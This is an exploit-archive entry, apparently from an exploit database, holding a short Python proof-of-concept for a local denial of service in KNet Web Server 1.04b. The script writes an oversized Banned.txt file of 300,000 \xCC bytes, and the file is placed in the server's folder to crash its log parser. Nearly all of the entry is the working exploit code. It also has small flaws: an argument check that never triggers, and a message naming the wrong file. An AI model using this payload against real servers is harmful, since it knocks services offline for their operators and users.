KNet Web Server 1.04b Denial Of Service



EKU-ID: 3275 CVE: OSVDB-ID:
Author: ne0z Published: 2013-06-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# Exploit Title 	: KNet Web Server 1.04b Local Denial Of Service
# Date			: 6 Jun 2013
# Exploit Author	: ne0z
# Vendor Homepage	: http://www.hatsecure.com
# Version		: KNet Web Server 1.04b
# Tested on		: Windows XP Profesional SP3
#			  Windows XP Profesional SP2
#			  Windows 7 Ultimate
#
# Description :
# KNet Web Server have banned log with location C:\\Program Files\KNet\Banned.txt
# The parser of the banned log is vulnerable, when size of content in Banned.txt more than 200 KB
# and then KNet Web Server will crash.
#
# To generate Banned.txt just simple (Windows)
# $ python KNet_DOS_exploit.py C://
#
# Then move the file from C:\\Banned.txt to  C:\\Program Files\KNet\Banned.txt

import sys, os

arg = sys.argv

if (len(arg) < 1):
	print "KNet v1.04b - Local DOS exploit"
	print "Usage : "
	print "$ python "+arg[0]+" [PATH]"
	print "Example : "
	print "$ python "+arg[0]
	sys.exit(0)

try:
	print "[X] Generate payload"
	d = open("Banned.txt","w")
	payload = "\xCC" * 300000
	d.write(payload)
	d.close()
	print "[X] Saved to Banner.txt"
except:
	print "Error"